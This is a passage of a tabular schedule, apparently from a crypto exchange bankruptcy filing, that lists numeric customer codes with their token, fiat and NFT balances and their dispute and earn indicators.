| 07390872 | | BRZ[1], CUSDT[1], DOGE[.00058907], TRX[.00034365], USD[0.01] | | |
| 07390876 | | DOGE[1], USD[0.00] | | |
| 07390880 | | DOGE[135.09739914], TRX[206.53766049], USD[0.00] | | |
| 07390881 | | USD[6.33] | | |
| 07390892 | | CUSDT[2], DOGE[913.53850802], ETH[.00505919], ETHW[.00505919], USD[0.00] | | |
| 07390895 | | CUSDT[2], USD[0.00] | | |
| 07390898 | | BRZ[8.42691487], BTC[.03681668], CAD[0.00], CUSDT[1721.34302234], DOGE[45381.15908775], ETH[1.14108348], ETHW[1.14060693], GRT[1555.78174816], KSHIB[14052.20708539], MATIC[423.95551964], SGD[0.00], SHIB[51438780.89030364], SOL[61.66611344], SUSHI[185.18033656], TRX[32848.14256044], UNI[51.49529072], USD[36.26], USDT[0] | Yes | |
| 07390902 | | BTC[.00878139], CUSDT[1], DOGE[38.67729148], TRX[1], USD[0.00] | | |
| 07390908 | | CUSDT[2.00065338], DOGE[339.83045597], LTC[1.05075688], TRX[.00079636], USD[0.00] | | |
| 07390910 | | CUSDT[236.02980603], DOGE[.0979402], GRT[.00003601], USD[0.37] | | |
| 07390911 | | DOGE[4], TRX[0], USD[0.00] | | |
| 07390914 | | BAT[1], BRZ[1], CUSDT[1], TRX[2], USD[0.01], USDT[0] | | |
| 07390917 | | CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07390918 | | BAT[9.28336954], BRZ[1], CAD[6.23], CUSDT[6], DOGE[2912.81801787], TRX[176.55535557], USD[0.00], USDT[9.94606151] | | |
| 07390920 | | USD[0.00] | | |
| 07390922 | | BTC[.0003657], USD[90.00] | | |
| 07390926 | | BAT[1.01655549], CUSDT[5], DOGE[.00000781], GRT[1], TRX[1], USD[0.00] | Yes | |
| 07390930 | | USD[10.00] | | |
| 07390933 | | USD[10.00] | | |
| 07390937 | | BRZ[1], CUSDT[7], GRT[2.0418665], TRX[3], USD[0.00] | Yes | |
| 07390940 | | DOGE[1], TRX[689.8064541], USD[0.00] | | |
| 07390941 | | USD[0.89] | | |
| 07390942 | | BRZ[1], CUSDT[2], DOGE[2039.2793691], ETH[.02949115], ETHW[.02949115], LINK[1.0270943], TRX[1], USD[0.00] | | |
| 07390946 | | BAT[1.000013], CUSDT[4], DOGE[0.00008784], GRT[2], TRX[.00002113], USD[0.01], USDT[1] | | |
| 07390947 | | NFT (567269647474462134/Entrance Voucher #2968)[1] | | |
| 07390948 | | USD[0.00] | | |
| 07390949 | | BTC[.00020924], USD[0.00] | | |
| 07390951 | | BAT[1], DOGE[8], SOL[.65218292], SUSHI[.01594158], UNI[.01581153], USD[-1.95] | | |
| 07390955 | | BRZ[3], CUSDT[3], GRT[1], TRX[5], USD[0.00] | | |
| 07390962 | | USD[0.00] | | |
| 07390965 | | BRZ[6], CUSDT[13], DOGE[5], TRX[6], USD[0.00], USDT[2] | | |
| 07390970 | | CUSDT[2], DOGE[121.19640788], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07390971 | | DOGE[2.00002152], USD[0.00] | | |
| 07390972 | | BAT[4682.15302435], BRZ[1], CUSDT[5], DOGE[3], ETH[2.48514630], ETHW[2.48420566], LTC[0], MATIC[1304.98742179], PAXG[0], SOL[257.90183866], TRX[5], UNI[0], USD[0.00], USDT[3.23315733] | Yes | |
| 07390973 | | BRZ[1], CUSDT[1], DOGE[672.30725554], TRX[1789.69182868], USD[0.01] | Yes | |
| 07390975 | | USD[10.00] | | |
| 07390976 | | BTC[0.00185574], DOGE[1], ETH[.00003475], ETHW[.00003475], USD[0.00] | Yes | |
| 07390977 | | CUSDT[8], DOGE[1.24018843], USD[0.01], USDT[0.00000001] | | |
| 07390979 | | BAT[6], BRZ[5], CUSDT[5], GRT[7], LINK[3], SOL[2], SUSHI[2], UNI[2], USD[18.55], USDT[5] | | |
| 07390981 | | SOL[.008], USD[0.01], USDT[.120992] | | |
| 07390983 | | BTC[0.00001655], USD[0.00], USDT[0] | | |
| 07390988 | | BAT[1.01123139], CUSDT[2], NFT [485208888302254178/FTX - Off The Grid Miami #4971][1], USD[0.01] | Yes | |
| 07390994 | | USD[0.00] | | |
| 07390996 | | USD[1.36] | | |
| 07390997 | | BRZ[5.07952967], CUSDT[3], DOGE[6.15787613], ETH[.53758802], ETHW[.53735725], GRT[1], TRX[3], USD[0.00], USDT[2.19316925] | Yes | |
| 07391003 | | BRZ[63.79907558], CUSDT[524.25683575], DOGE[1059.38918342], GRT[1], TRX[2], USD[0.01] | | |
| 07391005 | | GBP[0.00], NFT [392970834824130631/Humpty Dumpty #1288][1], USD[0.00], USDT[0] | Yes | |
| 07391010 | | USD[0.05] | Yes | |
| 07391011 | | CUSDT[3], DOGE[794.34381867], USD[0.00] | | |
| 07391014 | | USD[10.00] | | |
| 07391016 | | BRZ[1], CUSDT[1], DOGE[.16732625], USD[0.00] | | |
| 07391018 | | BRZ[14], CUSDT[119], DOGE[4632.57424202], GRT[3144.20202199], LINK[89.95795086], SHIB[1984515.63442758], TRX[60.06291067], USD[460.50], USDT[1] | | |
| 07391020 | | CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07391026 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], LINK[0], LTC[0], SHIB[18895093.29628846], TRX[0], USD[0.00], USDT[0] | | |
| 07391027 | | BRZ[1], USD[0.01] | | |
| 07391028 | | DOGE[68.39942473], USD[0.00] | | |
| 07391031 | | BTC[.00143572], DOGE[3], ETH[.01292997], ETHW[.01292997], GRT[18.69725485], SOL[10.35601376], TRX[2], USD[0.00] | | |
| 07391032 | | BAT[19.55030785], BRZ[1], CUSDT[7], DOGE[3.95342372], GRT[35.37169233], LINK[1.29464031], MATIC[12.2083044], SOL[4.13476694], TRX[210.03377229], USD[0.07] | Yes | |
| 07391034 | | BF_POINT[300], NFT [525485391218521437/Entrance Voucher #2830][1], USD[0.00], USDT[0.00000001] | Yes | |
| 07391036 | | BAT[.00275714], CUSDT[10], DOGE[6], SHIB[44.06211882], SOL[.00020000], SUSHI[.00020651], TRX[4], USD[0.01], USDT[1.06329186] | Yes | |
| 07391037 | | CUSDT[1], USD[0.00] | Yes | |
| 07391042 | | CUSDT[2], KSHIB[527.14147898], USD[0.00] | | |
| 07391043 | | BRZ[2], CUSDT[17], DOGE[1967.23781002], TRX[9.01851208], USD[15.37], USDT[1.10899207] | Yes | |
| 07391046 | | BAT[1], USD[0.00], USDT[1] | | |
| 07391047 | | BTC[.00075719], CUSDT[1], USD[0.00] | | |
| 07391049 | | BRZ[2], CUSDT[1], DOGE[8], USD[23.52] | | |
| 07391051 | | USD[2.00] | | |
| 07391052 | | DOGE[40.93199422], USD[10.00] | | |
| 07391054 | | USD[0.00], USDT[0] | | |
| 07391057 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07391065 | | DOGE[1], GRT[265.25707754], TRX[2], USD[0.00] | Yes | |
| 07391066 | | BTC[.0000564], USD[0.13], USDT[.00638994], YFI[.000568] | | |
| 07391067 | | CUSDT[3], DOGE[.02121556], TRX[420.11380234], USD[0.00] | Yes | |
| 07391070 | | SHIB[19028.11412043], USD[0.00] | Yes | |
| 07391072 | | BTC[0], ETH[0], ETHW[0], PAXG[0], USD[0.00], USDT[0] | | |
| 07391078 | | AVAX[0], BTC[0], DOGE[0], ETHW[.00012477], LTC[0], MATIC[0], MKR[0], NFT [360647453821049770/FTX - Off The Grid Miami #1728][1], NFT [494415283682388696/FTX - Off The Grid Miami #7500][1], SOL[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07391080 | | CUSDT[3], DOGE[53.84654983], KSHIB[170.72499907], SHIB[546915.05725517], TRX[2.30075181], USD[1.75] | | |
| 07391081 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07391082 | | CUSDT[2], DOGE[.92538619], USD[0.01] | Yes | |
| 07391083 | | BTC[0], CUSDT[4], USD[0.00] | Yes | |
| 07391085 | | USD[0.01] | | |
| 07391091 | | DAI[.05292948], USD[0.79] | | |
| 07391094 | | AAVE[14.23199568], AVAX[.05402], BTC[.01348652], ETH[.00023171], ETHW[0.00023170], NFT [469715310031601728/Entrance Voucher #29535][1], SOL[.004215], UNI[.00000001], USD[26179.05], USDT[12071.71641126] | | |
| 07391097 | | BTC[.10356687], ETH[3.85605277], ETHW[3.85605277], UNI[1], USD[1.56], USDT[1] | | |
| 07391100 | | DOGE[4], TRX[1], USD[0.00] | | |
| 07391104 | | BTC[.05273653], CUSDT[7], DOGE[9.60802375], GRT[1.00498957], LINK[134.26458188], TRX[3], USD[0.00] | Yes | |
| 07391106 | | DOGE[189.29345871], USD[0.00] | Yes | |
| 07391113 | | ETH[.00000001], ETHW[0], USD[0.01] | | |
| 07391120 | Contingent, Disputed | BRZ[1], DOGE[3], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07391121 | | BTC[0], ETHW[.5087682], SOL[0], USD[3.61] | | |
| 07391122 | | AAVE[0], CUSDT[8], DOGE[1], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07391123 | | USD[0.00] | Yes | |
| 07391125 | | BAT[1.0165555], BRZ[1], CUSDT[9], DOGE[26.4252705], ETH[.01267989], ETHW[0.01252212], GRT[1.00367791], TRX[2], USD[0.00], USDT[0.00000715] | Yes | |
| 07391126 | | DOGE[.09142317], TRX[1], USD[0.00] | | |
| 07391127 | | USD[0.00] | | |
| 07391129 | | BTC[0], DOGE[82.68504266], SHIB[1], USD[0.00] | | |
| 07391130 | | USD[0.00] | | |
| 07391134 | | USD[30.90] | | |
| 07391135 | | DOGE[1], SHIB[1], USD[96.46] | | |
| 07391136 | | USD[0.38] | | |
| 07391137 | | CUSDT[1], USD[0.01] | | |
| 07391138 | | BAT[1], BRZ[5], CUSDT[21], DOGE[162.90116009], GRT[1], SHIB[7601095.55761629], SOL[6.03367073], TRX[21], USD[0.02], USDT[3] | | |
| 07391139 | | USD[10.18] | Yes | |
| 07391140 | | CUSDT[1], USD[0.00] | | |
| 07391141 | | BTC[0], ETHW[.84845901], SOL[0.00464621], SUSHI[0], USD[6302.35], USDT[0] | | |
| 07391147 | | LTC[0], SOL[0], TRX[0.45678614], USD[1.56] | | |
| 07391148 | | GRT[4.60279084], USD[0.00] | | |
| 07391149 | | BTC[0], DAI[0], DOGE[0], LINK[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07391153 | | USD[11.07] | Yes | |
| 07391154 | | CUSDT[3], DOGE[1], GRT[173.64083278], TRX[1], USD[0.00] | | |
| 07391155 | | USD[0.00] | Yes | |
| 07391157 | | USD[0.00] | | |
| 07391158 | | CUSDT[1], USD[0.00] | | |
| 07391160 | | BRZ[2], CUSDT[4], DOGE[1670.66672023], USD[0.15] | | |
| 07391166 | | BAT[41.0001171], BRZ[1], CUSDT[4], DOGE[4.05213569], GRT[35.63430792], TRX[1], UNI[4.22213265], USD[0.00] | Yes | |
| 07391168 | | SOL[4.04228142], TRX[0], USD[0.00] | Yes | |
| 07391170 | | CUSDT[1], DOGE[.00002137], USD[36.56] | | |
| 07391171 | | BCH[0.00131582] | | |
| 07391178 | | BAT[2.0744852], BTC[.14428043], CUSDT[10], DOGE[.00035411], ETH[.57622303], ETHW[.57598107], GRT[1.00367791], SHIB[745.45944875], TRX[4], USD[0.00] | Yes | |
| 07391186 | | BRZ[1], DOGE[277.62948102], SHIB[3], SOL[43.33386738], USD[35.93], USDT[11.70596809] | Yes | |
| 07391187 | Contingent, Disputed | AAVE[0], BTC[0], ETH[0], ETHW[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07391199 | | USD[10.00] | | |
| 07391201 | | CUSDT[3], DOGE[112.2314213], LTC[.09375834], SHIB[1], TRX[1], USD[0.00] | | |
| 07391204 | | SOL[49.81], USD[39.13] | | |
| 07391207 | | USD[10.00] | | |
| 07391209 | | USD[10.00] | | |
| 07391210 | | BTC[0], DOGE[0], USD[42.19], USDT[0.00000001] | Yes | |
| 07391211 | | CUSDT[2], DOGE[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07391216 | | CUSDT[2], DOGE[1], TRX[1034.88833296], USD[0.61] | | |
| 07391220 | | DOGE[97.34992301], USD[0.00] | Yes | |
| 07391221 | | CUSDT[5], SHIB[3], TRX[3], USD[0.01] | | |
| 07391222 | | USD[50.00] | | |
| 07391227 | | BTC[0], ETH[.00000001], NFT (367250770827459743/Romeo #216)[1], SOL[0], USD[1.03] | | |
| 07391231 | | AAVE[1.14412561], AVAX[.00011587], BAT[749.89251704], BRZ[45.82732853], CHF[130.16], CUSDT[105.08502679], DAI[.71883839], ETH[.1556505], ETHW[2.51881635], EUR[662.89], GBP[0.00], GRT[1641.08782246], KSHIB[6097.12232308], LINK[.00043817], MKR[.15252519], NEAR[2.95802884], NFT (473015103273153644/Sunset #79)[1], PAXG[.00581758], SGD[1.03], SHIB[3693172.69735588], SOL[1.00003318], SUSHI[54.99582918], UNI[.00018868], USD[739.29], USDT[4.41793208], WBTC[.00544709], YFI[.00000039] | Yes | |
| 07391232 | | DOGE[2814.09778327], USD[0.00] | | |
| 07391234 | | CUSDT[3], DOGE[.34499534], TRX[1], USD[0.00] | | |
| 07391236 | | BTC[0], CUSDT[17], DAI[0], DOGE[1], ETH[0], LINK[0], SOL[0], TRX[3], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07391242 | | BRZ[1], CUSDT[4], DOGE[.00031875], USD[0.00] | Yes | |
| 07391243 | | BTC[.00005202], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07391244 | | BCH[0], BTC[0.00003906], LINK[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07391246 | | CUSDT[1466.24283762], DOGE[730.6254284], ETH[.00719959], ETHW[.00719959], GRT[1], LINK[.55176599], LTC[.07982602], TRX[126.60886718], USD[0.08] | | |
| 07391248 | | BRZ[1], CUSDT[1], DOGE[1], TRX[.0790014], USD[0.00] | Yes | |
| 07391249 | | DOGE[147.81529001], USD[0.00] | | |
| 07391252 | | BRZ[1], SHIB[1], SOL[.00098264], SUSHI[66.31897931], TRX[1], USD[10329.07] | Yes | |
| 07391253 | | DOGE[83.93510137], TRX[55.55] | | |
| 07391254 | | KSHIB[519.16531196], MATIC[9.43581301], SHIB[1], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07391255 | | DOGE[1], USD[0.00] | | |
| 07391257 | | CUSDT[1], DOGE[109.34306833], SOL[2.13641061], USD[0.00] | | |
| 07391259 | | USD[0.00] | | |
| 07391262 | | SHIB[1], TRX[1], USD[134.32] | | |
| 07391263 | | DOGE[1], TRX[1992.73449004], USD[0.00] | | |
| 07391264 | | CUSDT[7], DOGE[16806.75809146], TRX[2], USD[0.00], USDT[1] | | |
| 07391267 | | LTC[.00932], USD[0.27] | | |
| 07391269 | | BRZ[2], TRX[1], UNI[.03483996], USD[0.00] | | |
| 07391270 | | BTC[.00036277], DOGE[185.66459585], USD[0.00] | Yes | |
| 07391271 | | AAVE[0], ALGO[0], AUD[0.00], BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[19.09], USDT[0], WBTC[0], YFI[0] | Yes | |
| 07391272 | | USD[3.03] | | |
| 07391274 | | USD[10.00] | | |
| 07391277 | | BRZ[1], BTC[0], CUSDT[1], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07391278 | | BTC[0], DOGE[0], LTC[0], SHIB[6304572.94448465], USD[59.57], USDT[0] | | |
| 07391284 | | BRZ[2], CUSDT[4], DOGE[2], USD[0.01] | | |
| 07391285 | | BTC[0], DOGE[0] | | |
| 07391286 | | DOGE[2], USD[19.37] | | |
| 07391288 | | DOGE[1], GRT[.31567001], USD[0.24] | | |
| 07391291 | | USD[10.00] | | |
| 07391292 | | CUSDT[1], DOGE[115.38111489], USD[0.00] | | |
| 07391297 | | CUSDT[0], DOGE[3], ETH[0], USD[0.00], USDT[0.00001409] | Yes | |
| 07391301 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07391302 | | USD[0.00] | | |
| 07391304 | | DOGE[2], ETH[3.98590496], ETHW[3.98590496], USD[0.00] | | |
| 07391306 | | CUSDT[3], DOGE[462.67605753], TRX[1], USD[0.00] | | |
| 07391308 | | CUSDT[91.10727961], DOGE[12.99998579], USD[0.20] | | |
| 07391309 | | CUSDT[1], DOGE[399.72862571], ETH[.00000247], ETHW[.00000247], USD[0.02] | | |
| 07391313 | | DOGE[1], TRX[497.75482707], USD[25.00] | | |
| 07391314 | | CUSDT[1], GBP[8.45], USD[0.00] | Yes | |
| 07391316 | | USD[10.00] | | |
| 07391317 | | DOGE[6573.201], GRT[1678.08825], SUSHI[211.89265], TRX[3880.7102], UNI[47.95763], USD[202.59] | | |
| 07391321 | | BTC[.00004767], USD[3.54], USDT[1] | | |
| 07391323 | | USD[10.00] | | |
| 07391324 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[1.29199016], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], PAXG[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07391326 | | BCH[0], BRZ[1], CUSDT[4], DOGE[1], SUSHI[0], TRX[1], USD[0.00] | | |
| 07391327 | | BAT[3.45362562], BRZ[1], CUSDT[27.71574005], DOGE[8], ETH[.00003928], ETHW[.00003928], GRT[2], KSHIB[43484.48440143], SGD[60.47], TRX[60.05347849], USD[0.68], USDT[0.49044971], YFI[.00025779] | | |
| 07391328 | | CUSDT[.47076065], EUR[0.00], TRX[1.00178509], USD[0.00] | Yes | |
| 07391330 | | USD[10.00] | | |
| 07391331 | | BAT[33.67213846], CUSDT[3], DOGE[631.86438738], GRT[8.9655297], LTC[.31676967], SOL[1.13126675], SUSHI[.56679063], TRX[400.47504349], UNI[.93100807], USD[0.00] | | |
| 07391333 | | CUSDT[1030.90576208], DOGE[160.29320877], SHIB[936813.6726222], TRX[1], USD[0.17] | Yes | |
| 07391337 | | BAT[1], BRZ[3], CUSDT[8], DOGE[10], TRX[8], USD[0.00], USDT[1] | | |
| 07391341 | | USD[10.00] | | |
| 07391347 | | BCH[0], DOGE[0], ETH[.00002235], ETHW[2.00302235], MATIC[.03495182], SOL[27.30439000], USD[1.61], USDT[0] | | |
| 07391357 | | BTC[.01287347], ETH[.09856993], ETHW[.09754369], USD[0.19] | Yes | |
| 07391360 | | CUSDT[2], DOGE[140.67793342], USD[0.00] | | |
| 07391362 | | USD[10.00] | | |
| 07391363 | | DOGE[281.45707772], TRX[366.30220812], USD[0.00] | | |
| 07391366 | | BAT[89.28097442], CUSDT[1], USD[0.00] | | |
| 07391371 | | CUSDT[2], DOGE[1], GRT[53.2915536], TRX[1], USD[0.18] | | |
| 07391372 | | BTC[.00003] | | |
| 07391374 | | DOGE[297.82445559], TRX[2], USD[0.00] | | |
| 07391375 | | USD[0.00] | | |
| 07391380 | | SOL[0.00000001], TRX[0.00002500], USD[0.00], USDT[0] | | |
| 07391382 | | BTC[.00010457], SOL[.54581125], USD[0.00] | | |
| 07391383 | | USD[0.00] | | |
| 07391390 | | DOGE[1], USD[0.01] | | |
| 07391394 | | CUSDT[6], DOGE[2880.81607016], ETH[.05164428], ETHW[.05164428], LTC[.15813516], SHIB[1364877.1610555], TRX[2], USD[376.25] | | |
| 07391395 | | ETHW[1.09321277], SHIB[1], SOL[0], USD[0.34] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07391397 | | CUSDT[26.40353853], DOGE[1.39455714], USD[0.00] | | |
| 07391405 | | BAT[3.18466951], BCH[4.98018859], BRZ[3], BTC[0.18595734], DOGE[713.26800976], ETH[.00002063], ETHW[1.82757279], GRT[0], LINK[29.96089312], LTC[0], SHIB[55], SUSHI[0], TRX[15], USD[2923.16] | Yes | |
| 07391407 | | DOGE[426.498901], USD[0.00] | | |
| 07391408 | | BRZ[1], CUSDT[8], DOGE[0], TRX[1], USD[0.01] | | |
| 07391409 | | BTC[.00000285], ETH[0.00181013], ETHW[0.00181013] | | |
| 07391412 | | GRT[1037.85335], TRX[2606.5072], USD[0.07], USDT[.99450763] | | |
| 07391413 | | DOGE[2], TRX[1], USD[0.01] | | |
| 07391422 | | BAT[0], BRZ[1], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07391427 | | BTC[.00000104], ETH[.00000001], ETHW[2.75220545], SOL[0.00027621], TRX[1], USD[0.01], USDT[1.06046701] | Yes | |
| 07391430 | | SOL[0], USD[0.00] | | |
| 07391433 | | USD[10.00] | | |
| 07391434 | | USD[.00], USDT[0] | | |
| 07391435 | | USD[0.00], USDT[.38951491] | | |
| 07391436 | | DOGE[1], USD[0.00] | | |
| 07391437 | | CUSDT[0], DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07391438 | | BTC[.000028], DOGE[700.93828875] | | |
| 07391439 | | BTC[0] | | |
| 07391441 | | USD[0.00], USDT[9.94307974] | | |
| 07391442 | | BTC[.000723], CUSDT[1], DOGE[515.95051881], ETH[.00801093], ETHW[.00801093], USD[0.00] | | |
| 07391445 | | CUSDT[3], DOGE[2333.55147132], TRX[2], USD[0.00], USDT[1.09978385] | Yes | |
| 07391446 | | USD[10.00] | | |
| 07391447 | | BRZ[2], DOGE[.15539463], SUSHI[1.09083149], TRX[194.96464937], USD[0.00] | Yes | |
| 07391451 | | CUSDT[1], DOGE[251.91367681], TRX[1], UNI[2.18843734], USD[0.00] | | |
| 07391452 | | BTC[0], ETH[0], USD[0.00] | | |
| 07391461 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.01] | Yes | |
| 07391462 | | BAT[1], BRZ[1], DOGE[4], SHIB[19767007.47808844], USD[0.00] | Yes | |
| 07391465 | | USD[10.00] | | |
| 07391468 | | BRZ[1], BTC[0], CUSDT[4], DOGE[2125.32634606], SHIB[3], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07391475 | | DOGE[0], SOL[0], TRX[0], USD[0.00] | | |
| 07391478 | | USD[100000.00] | | |
| 07391479 | | BRZ[1], DOGE[2], TRX[1], USD[0.01] | | |
| 07391487 | | USD[10.00] | | |
| 07391489 | | CUSDT[1], DOGE[287.15872312], USD[0.00] | | |
| 07391490 | | CUSDT[1], DOGE[3], SOL[0], TRX[2] | | |
| 07391493 | | CUSDT[12], DOGE[2.69567638], TRX[2], USD[0.25] | | |
| 07391495 | | ETH[.00000001], SOL[0.00000083] | | |
| 07391496 | | DOGE[2], USD[0.00] | | |
| 07391499 | | DOGE[3], GRT[0], USD[0.00] | | |
| 07391501 | | CUSDT[2], DOGE[3], TRX[1], USD[0.00] | | |
| 07391506 | | USD[5.66] | | |
| 07391513 | | USD[10.00] | | |
| 07391518 | | USD[10.00] | | |
| 07391519 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07391520 | | USD[0.00] | | |
| 07391522 | | ETH[.000028], ETHW[.000028], MATIC[50], NFT [341968929544006235/Night Light #417][1], NFT [416614719885071955/Reflector #563][1], NFT [431509002868853092/Colossal Cacti #341][1], NFT [489154498383178826/Night Light #392][1], USD[0.25] | | |
| 07391523 | | CUSDT[1], USD[0.00] | | |
| 07391525 | | BTC[.00416127], DOGE[335.27086365], SOL[.00789766], USD[0.00] | | |
| 07391527 | | BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07391528 | | BTC[0], USD[0.00], USDT[0.00000001] | | |
| 07391530 | | BAT[0.07697062], BRZ[0], BTC[0], CUSDT[2.06252553], DOGE[3.00671932], ETH[0], GRT[0.00299724], LINK[0], LTC[0], SOL[0], TRX[0.00896515], UNI[0], USD[0.01], USDT[0] | | |
| 07391537 | | DOGE[166.25927602], USD[0.00] | | |
| 07391540 | | BAT[1.0165555], BRZ[2], CUSDT[7], SHIB[1], USD[0.22], USDT[0.00004150] | Yes | |
| 07391543 | | DOGE[.604], ETH[.000959], SOL[.00816348], USD[0.00] | | |
| 07391544 | | CUSDT[1], SHIB[744788.73964609], TRX[1], USD[0.00] | Yes | |
| 07391551 | | USD[0.01] | | |
| 07391552 | | CUSDT[2], NFT [480800673174499633/FTX - Off The Grid Miami #2532][1], TRX[.01367555], USD[0.62] | Yes | |
| 07391553 | | USD[0.00] | | |
| 07391556 | | BCH[0], BTC[0], DOGE[0], ETH[0.00244924], ETHW[0.00242186], SHIB[9.65312666], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07391560 | | SHIB[1], USD[0.00] | | |
| 07391561 | | AUD[1.24], CAD[1.23], DOGE[25.67476765], SGD[1.31], TRX[21.31946601], USD[2.00], USDT[.99440734] | | |
| 07391565 | | BCH[0], BTC[.00003196], CUSDT[5], DOGE[155.77746966], ETH[.00021589], ETHW[.00021589], GRT[1.02419624], KSHIB[271.24028417], LINK[.06056583], LTC[.02436043], MATIC[4.94054906], SHIB[152671.37567412], SUSHI[0.99154430], UNI[.07356515], USD[0.00] | | |
| 07391570 | | BF_POINT[200] | | |
| 07391572 | | BTC[0], DOGE[5], GRT[1], LINK[0], MATIC[0], SHIB[28.38994787], TRX[1], USD[0.01] | Yes | |
| 07391573 | | SOL[0.00000491], TRX[.01079411], USD[0.00] | Yes | |
| 07391578 | | BRZ[2], DOGE[9396.74415033], TRX[2], USD[0.00], USDT[1] | | |
| 07391580 | | DOGE[455.90772180], ETH[0], USD[0.00] | | |
| 07391587 | | ETH[0.00367824], USD[0.93] | | |
| 07391588 | | USD[10.94] | Yes | |
| 07391590 | | USD[10.00] | | |
| 07391595 | | BAT[1], CUSDT[1], DOGE[4], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07391598 | | NFT (349208872382365348/Imola Ticket Stub #967)[1], NFT (477826654674544892/The Hill by FTX #1050)[1], SHIB[0], TRX[1], USD[0.00] | Yes | |
| 07391599 | | CUSDT[1], USD[11.74] | | |
| 07391605 | | CUSDT[4], DOGE[0], USD[0.01] | | |
| 07391606 | | ETH[.6480956], ETHW[.6480956], LTC[.687378], SOL[108.35127808], SUSHI[17.9316], TRX[0], USD[0.99] | | |
| 07391608 | | BTC[0.00016664], SOL[0], USD[774.63] | | |
| 07391610 | | USD[10.00] | | |
| 07391614 | | SOL[0], SUSHI[0], TRX[.000006], USD[0.00], USDT[0.89122884] | | |
| 07391617 | | BRZ[0], BTC[0], DOGE[0], GRT[0], LINK[0], SUSHI[0], TRX[0], USD[0.10] | | |
| 07391630 | | USD[10.00] | | |
| 07391631 | | USD[0.00] | | |
| 07391632 | | SUSHI[.328] | | |
| 07391633 | | BTC[.01143918], ETH[.23196498], ETHW[.23196498], SOL[2.37159928], USD[2.61] | | |
| 07391637 | | BTC[0], CUSDT[4], DOGE[0], ETH[0], SUSHI[0], TRX[1], USD[0.00], USDT[0] | | |
| 07391638 | | BTC[0.00000127], USD[1.28] | Yes | |
| 07391639 | | GRT[220.326], USD[0.02] | | |
| 07391640 | | BTC[.73983498], LINK[104.202305], LTC[7.79072], USD[3.27] | | |
| 07391645 | | CUSDT[1], USD[0.00] | | |
| 07391646 | | CUSDT[1], DOGE[4553.68890572], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07391648 | | ETH[0], SOL[.00000001] | | |
| 07391652 | | CUSDT[3], DOGE[.0000957], USD[0.00], USDT[2.98292392] | | |
| 07391653 | | SOL[0], USD[0.00] | | |
| 07391655 | | BAT[1.0165555], BTC[0.01027308], CUSDT[11], DOGE[84.91053306], ETH[.4718524], ETHW[.47164983], LINK[1.13482242], SOL[1.10299557], USD[0.00] | | |
| 07391657 | | USD[0.00] | | |
| 07391661 | | BTC[.00006155], DOGE[2.41651321], ETH[.00102547], ETHW[.00102547], USD[0.00] | | |
| 07391662 | | USD[0.00] | | |
| 07391664 | | USD[10.00] | | |
| 07391669 | | SOL[1] | | |
| 07391670 | | BCH[0], BRZ[1], BTC[0.00129496], CUSDT[23], DOGE[1], ETH[0.01083217], ETHW[0.01069537], LINK[0], LTC[0], MATIC[.0000901], NFT (491553348281702690/Kiddo #3553)[1], NFT (513629205011744542/Mech #2400)[1], NFT (571576174201030909/Kiddo #4601)[1], SOL[0.01593833], SUSHI[0], TRX[2], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07391671 | | USD[0.00], USDT[0.00000001] | | |
| 07391675 | | USD[0.00] | | |
| 07391683 | | CUSDT[1], DOGE[2], SOL[8.30631962], TRX[2], USD[15.00] | | |
| 07391693 | | ETHW[0], USD[1000.47] | | |
| 07391697 | | BTC[.0070757], USD[11.96] | | |
| 07391701 | | SOL[.5], USD[0.88] | | |
| 07391702 | | DOGE[9107.6520851], TRX[1], UNI[8.64977068], USD[250.00] | | |
